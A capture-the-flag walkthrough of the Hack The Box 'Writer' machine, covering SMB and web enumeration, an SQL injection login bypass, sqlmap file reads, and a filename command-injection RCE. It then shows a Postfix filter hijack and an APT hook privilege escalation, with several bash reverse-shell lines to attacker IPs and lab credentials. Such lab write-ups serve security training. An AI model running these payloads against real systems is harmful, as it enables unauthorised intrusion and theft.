HTB Writer Walkthrough

Scanning

Let’s begin with a SYN port scan to find all the open ports on the target machine:

nmap -Pn -sS -p- -T4 -vv -oX nmap_syn_complete.xml writer.htb
Port State Service Reason Product Version Extra Info
22 tcp open ssh syn-ack
80 tcp open http syn-ack
139 tcp open netbios-ssn syn-ack
445 tcp open microsoft-ds syn-ack

Then, let's identify the services running on those ports:

nmap -Pn -sS -sV -sC -p 22,445,139,80 -T4 -vv -oX nmap_limited_complete.xml writer.htb
Port State Service Reason Product Version Extra Info
22 tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2
80 tcp open http syn-ack Apache httpd 2.4.41
139 tcp open netbios-ssn syn-ack Samba smbd 4.6.2
445 tcp open netbios-ssn syn-ack Samba smbd 4.6.2

To sum up, there are three active services on the target machine: SSH, HTTP, and SMB (on both ports 139 and 445). I can now enumerate them to find anything interesting.

Enumeration

SMB

The first service I’m going to look at is SMB. SMB is a protocol used by Windows to share files and directories. It’s a very common protocol, and it’s used by many popular file sharing services. If it’s open, I can enumerate the shared directories on the target machine and access the files inside of them.

In order to do this, I use the enum4linux tool, whose output is reported below (redacted to make it easier to read and to highlight the important bits):
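
For reference, the invocation I typically use looks like the following (flags reconstructed from memory, so they may differ slightly from the run that produced this output):

enum4linux -a writer.htb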

( Target Information )

Target ........... writer.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

( Nbtstat Information for writer.htb )

Looking up status of 10.10.11.101
WRITER <00> - B <ACTIVE> Workstation Service
WRITER <03> - B <ACTIVE> Messenger Service
WRITER <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

( Session Check on writer.htb )

[+] Server writer.htb allows sessions using username '', password ''

( Users on writer.htb )

index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: kyle Name: Kyle Travis Desc:

( Share Enumeration on writer.htb )


Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
writer2_project Disk
IPC$ IPC IPC Service (writer server (Samba, Ubuntu))

[+] Attempting to map shares on writer.htb

//writer.htb/print$ Mapping: DENIED, Listing: N/A
//writer.htb/writer2_project Mapping: DENIED, Listing: N/A
//writer.htb/IPC$
[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

( Password Policy Information for writer.htb )

[+] Attaching to writer.htb using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

[+] WRITER
[+] Builtin

[+] Password Info for Domain: WRITER

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\kyle (Local User)
S-1-22-1-1001 Unix User\john (Local User)

[+] Enumerating users using SID S-1-5-21-1663171886-1921258872-720408159 and logon username '', password ''

S-1-5-21-1663171886-1921258872-720408159-501 WRITER\nobody (Local User)
S-1-5-21-1663171886-1921258872-720408159-513 WRITER\None (Domain Group)
S-1-5-21-1663171886-1921258872-720408159-1000 WRITER\kyle (Local User)

So, what I can see is that the SMB domain is WRITER and that there are two local users: kyle and john. The password policy has a very low minimum length requirement, so I could try to brute-force their credentials, but I don't want to proceed that way. Last but not least, there is a shared folder called writer2_project, but anonymous access to it is denied and I can't list any of the files inside it.
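
For completeness, the same picture can be confirmed manually with smbclient (a sketch; an anonymous session should be able to list the shares but not the contents of writer2_project):

smbclient -N -L //writer.htb
smbclient -N //writer.htb/writer2_project -c 'ls'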

HTTP

The second service I investigate is the HTTP web server on port 80. Web applications are often the entry point for a compromise, so I'm going to focus on it.

The application seems to be a simple blog-like platform, inside of which users can write and share some kind of content.

I can enumerate the users and the content they have written, but I'm not sure how useful that is. For now, I've written down the list of post authors in case they come in handy later.

First of all, I run (my best friend) ffuf to enumerate the accessible directories on the target server (sorry, I didn't take screenshots of the output 🙏). As a result, I find the administrative directory, which looks very interesting since it contains a login page.
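
For reference, the ffuf run looked roughly like this (the wordlist path is just the one I normally use, not necessarily the one from that session):

ffuf -u http://writer.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt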

Two approaches come to mind: either brute-force the login page using the usernames collected from the blog posts and the SMB enumeration, or try some sort of login bypass. The first one brings no luck.

Before using sqlmap to check whether the request is vulnerable to SQL injection, I try some of the most common login bypass techniques. Luckily, the first payload I try works like a charm and I can log in as an administrator:

USERNAME: ' OR 1=1-- -'
PASSWORD: anything

Having access to the administration dashboard, I can take a look at the platform's functionality in order to expand my attack surface. An admin basically has the ability to create, edit and delete posts, and also to attach files to them, either uploading a local file or fetching a remote one. The first thing I want to focus on is the file upload feature, which could lead to RCE.

Playing with it I can deduce that:

  1. the uploaded files need to have a .jpg extension;
  2. the uploaded files are placed at the /img/filename.jpg location;
  3. renaming a PHP file to .jpg gets it uploaded, but its content is not executed.
    Neither manual nor automated fuzzing found a way to upload an executable file (again, thanks to my best friend ffuf and the PayloadsAllTheThings repo).

Having no clue how to overcome this, I decide to exploit the previously identified SQL injection vulnerability with sqlmap and enumerate the database content, looking for valid credentials that might let me log in over SSH. The database contains three tables: site, stories and users.
The users table only contains one row, and its hash doesn't seem to be crackable at a first attempt.
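
The enumeration boils down to a few sqlmap runs against the same injectable login request (a sketch; the exact switches may have been slightly different):

sqlmap -u http://writer.htb/administrative --data="uname=admin&password=password" --dbs
sqlmap -u http://writer.htb/administrative --data="uname=admin&password=password" -D writer --tables
sqlmap -u http://writer.htb/administrative --data="uname=admin&password=password" -D writer -T users --dump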

web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
Database: writer
Table: users
[1 entry]
+----+------------------+--------+----------------------------------+----------+--------------+
| id | email | status | password | username | date_created |
+----+------------------+--------+----------------------------------+----------+--------------+
| 1 | admin@writer.htb | Active | 118e48794631a9612484ca8b55f622d0 | admin | NULL |
+----+------------------+--------+----------------------------------+----------+--------------+

Having no idea how to go further, I decide to check the DBMS user's privileges and (luckily) I find that the current user can read files on the local filesystem:
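
The check itself is a single sqlmap switch against the same injection point (a sketch):

sqlmap -u http://writer.htb/administrative --data="uname=admin&password=password" --privileges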

web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
database management system users privileges:
[*] 'admin'@'localhost' [1]:
privilege: FILE

To make sure the privilege works as intended, I try to dump the /etc/passwd file, and it succeeds:

sqlmap -u http://writer.htb/administrative --data="uname=admin&password=password" --file-read=/etc/passwd
-----
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
kyle:x:1000:1000:Kyle Travis:/home/kyle:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
postfix:x:113:118::/var/spool/postfix:/usr/sbin/nologin
filter:x:997:997:Postfix Filters:/var/spool/filter:/bin/sh
john:x:1001:1001:,,,:/home/john:/bin/bash
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false

I need to read the Apache virtual host configuration file to get a better idea of the web application's location, but I can't remember its path. To overcome this, I use a technique LiveOverflow showed in one of his videos (probably this one, but I'm not completely sure): spinning up a Docker container as an empty "clone" of the target environment, so I can navigate it and work out the right paths.

docker pull ubuntu/apache2

docker run -d ubuntu/apache2

docker exec -it a676098665d00988b138298c8ae41391cd742cf008ec67dd2e235fd3c783f935 /bin/bash

So, using the ubuntu/apache2 image to find the right path and sqlmap (of course) to read it, I can dump what I need: the /etc/apache2/sites-enabled/000-default.conf file:
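
The read uses the same technique as for /etc/passwd, just with a different path (a sketch):

sqlmap -u http://writer.htb/administrative --data="uname=admin&password=password" --file-read=/etc/apache2/sites-enabled/000-default.conf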

# Virtual host configuration for writer.htb domain
<VirtualHost *:80>
ServerName writer.htb
ServerAdmin admin@writer.htb
WSGIScriptAlias / /var/www/writer.htb/writer.wsgi
<Directory /var/www/writer.htb>
Order allow,deny
Allow from all
</Directory>
Alias /static /var/www/writer.htb/writer/static
<Directory /var/www/writer.htb/writer/static/>
Order allow,deny
Allow from all
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
LogLevel warn
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

# Virtual host configuration for dev.writer.htb subdomain
# Will enable configuration after completing backend development
# Listen 8080
#<VirtualHost 127.0.0.1:8080>
# ServerName dev.writer.htb
# ServerAdmin admin@writer.htb
#
# Collect static for the writer2_project/writer_web/templates
# Alias /static /var/www/writer2_project/static
# <Directory /var/www/writer2_project/static>
# Require all granted
# </Directory>
#
# <Directory /var/www/writer2_project/writerv2>
# <Files wsgi.py>
# Require all granted
# </Files>
# </Directory>
#
# WSGIDaemonProcess writer2_project python-path=/var/www/writer2_project python-home=/var/www/writer2_project/writer2env
# WSGIProcessGroup writer2_project
# WSGIScriptAlias / /var/www/writer2_project/writerv2/wsgi.py
# ErrorLog ${APACHE_LOG_DIR}/error.log
# LogLevel warn
# CustomLog ${APACHE_LOG_DIR}/access.log combined
#
#</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

So there are two virtual hosts: the first one (hit by default on every route) serves the blog platform already analyzed, and the second one is an "under development" platform which is inaccessible right now because it has been commented out. It's important to notice that both of them use the mod_wsgi Apache module, which allows running Python web applications. In addition, the WSGIScriptAlias directive configures the server to execute the writer.wsgi script whenever a request is received on the / route.

The content of writer.wsgi (retrieved via sqlmap like the previous files) is the following:

#!/usr/bin/python
import sys
import logging
import random
import os

# Define logging
logging.basicConfig(stream=sys.stderr)
sys.path.insert(0,"/var/www/writer.htb/")

# Import the __init__.py from the app folder
from writer import app as application
application.secret_key = os.environ.get("SECRET_KEY", "")

It imports the __init__.py file, which contains the main logic of the Flask application behind the blog platform (again, I've extracted only the most important parts, since the file is a big one):

sqlmap -u http://writer.htb/administrative --data="uname=admin&password=password" --file-read=/var/www/writer.htb/writer/__init__.py

----
[...]
#Define connection for database
def connections():
    try:
        connector = mysql.connector.connect(user='admin', password='ToughPasswordToCrack', host='127.0.0.1', database='writer')
        return connector
    except mysql.connector.Error as err:
        if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
            return ("Something is wrong with your db user name or password!")
        elif err.errno == errorcode.ER_BAD_DB_ERROR:
            return ("Database does not exist")
        else:
            return ("Another exception, returning!")
    else:
        print ('Connection to DB is ready!')
[...]
@app.route('/dashboard/stories/edit/<id>', methods=['GET', 'POST'])
def edit_story(id):
    if not ('user' in session):
        return redirect('/')
    try:
        connector = connections()
    except mysql.connector.Error as err:
        return ("Database error")
    if request.method == "POST":
        cursor = connector.cursor()
        cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id})
        results = cursor.fetchall()
        if request.files['image']:
            image = request.files['image']
            if ".jpg" in image.filename:
                path = os.path.join('/var/www/writer.htb/writer/static/img/', image.filename)
                image.save(path)
                image = "/img/{}".format(image.filename)
                cursor = connector.cursor()
                cursor.execute("UPDATE stories SET image = %(image)s WHERE id = %(id)s", {'image':image, 'id':id})
                result = connector.commit()
            else:
                error = "File extensions must be in .jpg!"
                return render_template('edit.html', error=error, results=results, id=id)
        if request.form.get('image_url'):
            image_url = request.form.get('image_url')
            if ".jpg" in image_url:
                try:
                    local_filename, headers = urllib.request.urlretrieve(image_url)
                    os.system("mv {} {}.jpg".format(local_filename, local_filename))
                    image = "{}.jpg".format(local_filename)
                    try:
                        im = Image.open(image)
                        im.verify()
                        im.close()
                        image = image.replace('/tmp/','')
                        os.system("mv /tmp/{} /var/www/writer.htb/writer/static/img/{}".format(image, image))
                        image = "/img/{}".format(image)
                        cursor = connector.cursor()
                        cursor.execute("UPDATE stories SET image = %(image)s WHERE id = %(id)s", {'image':image, 'id':id})
                        result = connector.commit()
                    except PIL.UnidentifiedImageError:
                        os.system("rm {}".format(image))
                        error = "Not a valid image file!"
                        return render_template('edit.html', error=error, results=results, id=id)
                except:
                    error = "Issue uploading picture"
                    return render_template('edit.html', error=error, results=results, id=id)
            else:
                error = "File extensions must be in .jpg!"
                return render_template('edit.html', error=error, results=results, id=id)
        title = request.form.get('title')
        tagline = request.form.get('tagline')
        content = request.form.get('content')
        cursor = connector.cursor()
        cursor.execute("UPDATE stories SET title = %(title)s, tagline = %(tagline)s, content = %(content)s WHERE id = %(id)s", {'title':title, 'tagline':tagline, 'content':content, 'id': id})
        result = connector.commit()
        return redirect('/dashboard/stories')

    else:
        cursor = connector.cursor()
        cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id})
        results = cursor.fetchall()
        return render_template('edit.html', results=results, id=id)
[...]

It's quite easy to see that post creation and editing implement the remote image upload mechanism really poorly: they use the os.system function to run the mv command and move the temporary image file (created by the urlretrieve function) into the static/img directory. This is dangerous because the file name is under the user's control and can be crafted to execute arbitrary commands on the system.

Something important to notice is that the urlretrieve function, used to copy a remote object to a temporary location, usually doesn't keep the original object name: it generates a random one. This might suggest that the application isn't vulnerable, since the user wouldn't control the string passed to os.system. However, this is not the case: as the official documentation states, if the URL points to a local file, the object will not be copied unless a filename is supplied, and the original file name is returned. Moreover, the file type check is weak, since it only verifies that the .jpg string appears somewhere in the file name.
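
To convince myself of this behaviour, a quick local check (run on my own machine against any local file) shows that a file:// URL makes urlretrieve return the original path instead of a temporary copy:

python3 -c 'import urllib.request; print(urllib.request.urlretrieve("file:///etc/hostname")[0])'
# prints /etc/hostname: the original path is returned, no temporary copy is created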

Exploit

RCE

We can chain the previous vulnerabilities together to get a complete RCE:

  1. upload a file with a bash injection payload in its name: this plants a file whose name contains a command inside a known local directory (/var/www/writer.htb/writer/static/img/)
    echo "bash -i >& /dev/tcp/10.10.14.146/8756 0>&1" | base64
    YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNDYvODc1NiAwPiYxCg==
  2. use the post-editing endpoint to set an existing story's image to the local path (via the remote image URL field):
    file:///var/www/writer.htb/writer/static/img/file.jpg `payload`
  3. the resulting os.system call (with a listener already waiting on the attacking machine, as shown right after this list) is:
    os.system("mv /var/www/writer.htb/writer/static/img/file.jpg `echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNDYvODc1NiAwPiYxCg==' | base64 -d | bash ` ...".format(local_filename, local_filename))

Looking around

The www-data user has no home directory, so it's of no use for getting the first flag. This means that at least one lateral movement is needed.

Looking around, I find that the "dev" project referenced in the virtual host configuration is still there and fully readable. It is a Django application, not very interesting by itself since it's not running, but it still contains some configuration files. One of these, settings.py, references a MySQL configuration file at /etc/mysql/my.cnf, which is also readable.

This file exposes some MySQL credentials, which can be used to navigate the dev database (which is different from the previous one dumped via sqlmap):
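
Reading it from the www-data shell obtained earlier is enough (the prompt is illustrative):

www-data@writer:/$ cat /etc/mysql/my.cnf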

# The MariaDB configuration file
#
# The MariaDB/MySQL tools read configuration files in the following order:
# 1. "/etc/mysql/mariadb.cnf" (this file) to set global defaults,
# 2. "/etc/mysql/conf.d/*.cnf" to set global options.
# 3. "/etc/mysql/mariadb.conf.d/*.cnf" to set MariaDB-only options.
# 4. "~/.my.cnf" to set user-specific options.
#
# If the same option is defined multiple times, the last one will apply.
#
# One can use all long options that the program supports.
# Run program with --help to get a list of available options and with
# --print-defaults to see which it would actually understand and use.

#
# This group is read both both by the client and the server
# use it for options that affect everything
#
[client-server]

# Import all .cnf files from configuration directory
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/

[client]
database = dev
user = djangouser
password = DjangoSuperPassword
default-character-set = utf8

Now I can interact with the database and look for credentials that might still be valid somewhere. As expected, the auth_user table contains a username and a password hash:

www-data@writer:/var/www/writer2_project/writerv2$ mysql --user=djangouser --password=DjangoSuperPassword dev
-----
MariaDB [dev]> show tables;
show tables;
+----------------------------+
| Tables_in_dev |
+----------------------------+
| auth_group |
| auth_group_permissions |
| auth_permission |
| auth_user |
| auth_user_groups |
| auth_user_user_permissions |
| django_admin_log |
| django_content_type |
| django_migrations |
| django_session |
+----------------------------+
10 rows in set (0.001 sec)

MariaDB [dev]> select * from auth_user;
select * from auth_user;
+----+------------------------------------------------------------------------------------------+------------+--------------+----------+------------+-----------+-----------------+----------+-----------+----------------------------+
| id | password | last_login | is_superuser | username | first_name | last_name | email | is_staff | is_active | date_joined |
+----+------------------------------------------------------------------------------------------+------------+--------------+----------+------------+-----------+-----------------+----------+-----------+----------------------------+
| 1 | pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A= | NULL | 1 | kyle | | | kyle@writer.htb | 1 | 1 | 2021-05-19 12:41:37.168368 |
+----+------------------------------------------------------------------------------------------+------------+--------------+----------+------------+-----------+-----------------+----------+-----------+----------------------------+
1 row in set (0.001 sec)

The prefix shows that the password is hashed with PBKDF2 (SHA-256), followed by the number of iterations, the salt and the hash itself. I can try to crack it using John the Ripper, which supports that format:

Note: I had some trouble formatting the hash file and couldn't find any references around the web addressing it. The only way I got it to work was to manually format the file like this:

kyle:$django$*1*pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A=
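
With the hash in that format, a plain wordlist attack can be launched (a sketch; the hash file name and wordlist path are just the ones I typically use):

john --format=Django --wordlist=/usr/share/wordlists/rockyou.txt kyle_django.hash
john --show kyle_django.hash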

User flag

The cracked credentials are valid for an SSH login as the kyle user. This way I'm able to read the user flag: a049fd994d4b5fb84aef8c72373e26af:
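
For reference, the login and flag read are as simple as (password omitted, flag in the usual HTB location):

ssh kyle@writer.htb
cat ~/user.txt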

Privilege Escalation

John user

After running linPEAS, I notice that kyle is the only member of the filter group:

What does the filter group additionally allow? Well, it makes it possible to edit /etc/postfix/disclaimer:

(remote) kyle@writer:/home/kyle$ find / -group filter 2> /dev/null
/etc/postfix/disclaimer
/var/spool/filter

The /etc/postfix/disclaimer file seems to be a Postfix content filter that is executed as the john user every time a mail is sent. It appends a disclaimer to outgoing messages:

#!/bin/sh
# Localize these.
INSPECT_DIR=/var/spool/filter
SENDMAIL=/usr/sbin/sendmail

# Get disclaimer addresses
DISCLAIMER_ADDRESSES=/etc/postfix/disclaimer_addresses

# Exit codes from <sysexits.h>
EX_TEMPFAIL=75
EX_UNAVAILABLE=69

# Clean up when done or when aborting.
trap "rm -f in.$$" 0 1 2 3 15

# Start processing.
cd $INSPECT_DIR || { echo $INSPECT_DIR does not exist; exit
$EX_TEMPFAIL; }

cat >in.$$ || { echo Cannot save mail to file; exit $EX_TEMPFAIL; }

# obtain From address
from_address=`grep -m 1 "From:" in.$$ | cut -d "<" -f 2 | cut -d ">" -f 1`

if [ `grep -wi ^${from_address}$ ${DISCLAIMER_ADDRESSES}` ]; then
/usr/bin/altermime --input=in.$$ \
--disclaimer=/etc/postfix/disclaimer.txt \
--disclaimer-html=/etc/postfix/disclaimer.txt \
--xheader="X-Copyrighted-Material: Please visit http://www.company.com/privacy.htm" || \
{ echo Message content rejected; exit $EX_UNAVAILABLE; }
fi

$SENDMAIL "$@" <in.$$

exit $?

The idea is to edit the disclaimer filter and add a custom piece of code that spawns a reverse shell, which will let us connect as john. Since a cron job runs every 4-5 minutes to restore the original files, it's better to write a small Python script that automates the entire exploitation process:

#!/usr/bin/python3.8
import smtplib

FILE = "/etc/postfix/disclaimer"
IP = "10.10.14.12"
PORT = "1337"

def patch_disclaimer():
    print("patching %s..." % FILE)
    file = open(FILE, "w")
    file.write("#!/bin/bash\nbash -i >& /dev/tcp/%s/%s 0>&1\n" % (IP, PORT))
    file.close()  # flush the payload to disk before the mail triggers the filter
    print("file patched, spawning the shell...")

server = smtplib.SMTP('localhost')
patch_disclaimer()
server.sendmail('root@azraelsec.it', 'john@idk.com', 'lulz')
server.quit()

Listening on port 1337, I catch the shell and can interact with the remote server as the john user:
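
On the attacking machine the listener is the usual netcat one, started before running the script as kyle on the target (the script name is just a placeholder):

nc -lvnp 1337
# then, on the target as kyle
python3.8 exploit.py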

I want a persistent session, since I don't want to re-run the entire process in case of connection loss. And since I've been trying out a tiny tool called pwncat, I use one of its modules, linux.implant.authorized_key, to install a custom SSH key pair in /home/john/.ssh/authorized_keys so that I can log in over SSH:

Root user

The first thing I notice is that john belongs to the management group. Considering how the previous steps developed, I start looking around for resources that only members of that group can access:

john@writer:~$ find / -group management 2> /dev/null
/etc/apt/apt.conf.d
john@writer:~$ ls -al /etc/apt/apt.conf.d/
total 48
drwxrwxr-x 2 root management 4096 Jul 28 09:24 .
drwxr-xr-x 7 root root 4096 Jul 9 10:59 ..
-rw-r--r-- 1 root root 630 Apr 9 2020 01autoremove
-rw-r--r-- 1 root root 92 Apr 9 2020 01-vendor-ubuntu
-rw-r--r-- 1 root root 129 Dec 4 2020 10periodic
-rw-r--r-- 1 root root 108 Dec 4 2020 15update-stamp
-rw-r--r-- 1 root root 85 Dec 4 2020 20archive
-rw-r--r-- 1 root root 1040 Sep 23 2020 20packagekit
-rw-r--r-- 1 root root 114 Nov 19 2020 20snapd.conf
-rw-r--r-- 1 root root 625 Oct 7 2019 50command-not-found
-rw-r--r-- 1 root root 182 Aug 3 2019 70debconf
-rw-r--r-- 1 root root 305 Dec 4 2020 99update-notifier

APT can be used to escalate privileges, as GTFOBins points out: https://gtfobins.github.io/gtfobins/apt-get/. The most common scenario is to abuse APT hooks to execute a small set of instructions when the privileged process performs an action (e.g. apt-get update). Placing a custom file inside /etc/apt/apt.conf.d is enough to register a custom APT hook; see the documentation to investigate further. The problem here is that I don't have john's password, so I cannot use sudo to run apt-get update myself. My only chance is to find some kind of trigger that does it for me.

I have low privileges but I still need to spot processes run by someone else: how can I do that? Looking on GitHub I find pspy, a tool that figures out which processes are being executed, without needing root, by scanning procfs and watching filesystem events through low-level OS calls (more details about its implementation can be found here).
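
pspy ships as a static binary, so getting it onto the box is just a file transfer (IP, port and paths below are illustrative):

# on the attacking machine, from the directory containing the pspy64 release binary
python3 -m http.server 8000
# on the target
wget http://10.10.14.12:8000/pspy64 -O /tmp/pspy64
chmod +x /tmp/pspy64
/tmp/pspy64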

Running it, I see that apt-get update is executed in a loop at regular intervals. This is the trigger I was looking for: if I put a custom hook file in /etc/apt/apt.conf.d, it will be executed as root the next time apt-get update runs. Moreover, the tool output shows (I've marked it in blue) the processes that restore the default configuration files I mentioned when talking about the Postfix filter.

Easy: now I just write a file called 00-azraelsec inside the /etc/apt/apt.conf.d folder with the following content and wait for a connection:

APT::Update::Pre-Invoke {"/bin/bash -i >& /dev/tcp/10.10.14.12/1337 0>&1";};
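
Writing the hook and catching the shell looks like this (single quotes keep the embedded double quotes intact; IP and port match the listener I already have running):

# on the target, as john
echo 'APT::Update::Pre-Invoke {"/bin/bash -i >& /dev/tcp/10.10.14.12/1337 0>&1";};' > /etc/apt/apt.conf.d/00-azraelsec
# on the attacking machine
nc -lvnp 1337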

Then I just go to /root and read the root.txt file: